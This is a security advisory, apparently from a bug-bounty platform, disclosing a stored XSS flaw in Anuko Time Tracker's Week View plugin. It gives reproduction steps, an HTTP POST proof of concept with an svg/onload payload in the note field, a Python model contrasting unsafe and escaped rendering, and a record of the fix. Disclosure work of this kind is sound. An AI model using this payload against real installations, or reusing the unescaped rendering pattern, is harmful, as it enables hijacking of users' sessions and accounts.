Stored XSS in Week View Plugin in anuko/timetracker

Valid

Reported on

Dec 18th 2022


Description

Stored cross-site scripting vulnerabilities arise when user input is stored and later embedded into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

Following authentication and after enabling the Week View plugin from the list of plugins integrated into Anuko Time Tracker, an attacker can take advantage of insufficient control of the user input on the POST parameter note to inject arbitrary javascript code that will be permanently stored. In this way, the input entered by the attacker will be triggered whenever the file timetracker/week.php is fetched for a previously specified date.

Requirements

• At least one existing project within the platform;

• Week View plugin should be enabled.

Steps-To-Reproduce

• Log into the platform at timetracker/login.php.

• Go to timetracker/projects.php and create at least one project to meet the first of the requirements in the list.

• Browse the plugin list at timetracker/plugins.php, enable Week View, then Save. Back on timetracker/plugins.php, a Configure option now appears right next to the above-mentioned plugin. Open the related form at timetracker/week_view.php, enable all of the listed options, then Save. This meets the second requirement.

• Now go to timetracker/time.php and create one entry on a specific date, selecting the current user and the related project and entering start and finish times so that the duration is calculated automatically. Before submitting, enter the XSS payload '"><svg/x=">"/onload=confirm()// in the note field.

• Submit the entry so that it will appear pending right below the submission form.

• Finally, open timetracker/week.php: the XSS fires whenever the entry list for the specified date is fetched.

Proof of Concept

POST /timetracker/time.php HTTP/1.1
Host: <REDACTED>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 202
Origin: http://<REDACTED>
Connection: close
Referer: http://<REDACTED>/timetracker/time.php
Cookie: tt_PHPSESSID=mm1eih01k11vv3m41vog4fntfe; tt_login=manager
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
DNT: 1
Sec-GPC: 1

date=2022-12-07&date=2022-12-07&user=2&project=1&start=22%3A04&finish=22%3A05&note=%27%22%3E%3Csvg%2Fx%3D%22%3E%22%2Fonload%3Dconfirm%28%29%2F%2F&btn_submit=Submit&user_changed=&browser_today=2022-12-18
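The following is an added example, not code from the report or from the Anuko Time Tracker code base. It models in Python what the description above says about stored XSS: the note is decoded from the captured POST body exactly as shown in the proof of concept, stored, and then rendered into week-view markup. The unsafe render concatenates the stored note verbatim; the hardened render HTML-encodes on output (quotes included) so the same note is displayed as text. The markup structure of the cell and the helper names are assumptions for illustration, not the project's own templates.

```python
from urllib.parse import parse_qs
from html import escape

# Constructed copy of the URL-encoded POST body from the proof of concept above.
POC_BODY = (
    "date=2022-12-07&date=2022-12-07&user=2&project=1&start=22%3A04&finish=22%3A05"
    "&note=%27%22%3E%3Csvg%2Fx%3D%22%3E%22%2Fonload%3Dconfirm%28%29%2F%2F"
    "&btn_submit=Submit&user_changed=&browser_today=2022-12-18"
)


def extract_note(body: str) -> str:
    """Decode the form body the way the server would and return the note as stored."""
    fields = parse_qs(body, keep_blank_values=True)
    return fields.get("note", [""])[0]


def render_note_unsafe(note: str) -> str:
    """Models the vulnerable pattern: the stored note is spliced into the week-view
    markup verbatim (assumed cell layout), so markup inside the note becomes part
    of the page and a quote/angle bracket breaks out of the attribute."""
    return f'<td class="note" title="{note}">{note}</td>'


def render_note_safe(note: str) -> str:
    """Hardened form: encode on output for both the attribute and the text context.
    quote=True also encodes ' and ", which is what keeps the note inside the
    attribute value instead of terminating it."""
    enc = escape(note, quote=True)
    return f'<td class="note" title="{enc}">{enc}</td>'


def looks_like_markup_injection(rendered: str, note: str) -> bool:
    """Cheap review check over rendered output: a note containing HTML-significant
    characters must never appear unchanged in the page."""
    return any(c in note for c in "<>\"'") and note in rendered


if __name__ == "__main__":
    stored = extract_note(POC_BODY)
    print("stored note:", stored)
    print("unsafe render:", render_note_unsafe(stored))
    print("safe render:  ", render_note_safe(stored))
```

Running the block prints the decoded note from the PoC, then the two renderings: the unsafe one contains a live `<svg ... onload=...>` element, while the safe one shows the note as `&lt;svg ...` text. The fix point is output encoding at render time in week.php (and any other page that displays the note), not input filtering at time.php, since the same stored value may be rendered in several contexts.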

Impact

If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can perform any action within the application that the user can perform, view any information that the user is able to view, modify any information that the user is able to modify or initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.

We are processing your report and will contact the anuko/timetracker team within 24 hours. 5 months ago
Ben Harvie validated this vulnerability 15 days ago
Samuele Gugliotta has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Ben Harvie marked this as fixed in 1.22.12.5783 with commit 093cfe 15 days ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Ben Harvie published this vulnerability 15 days ago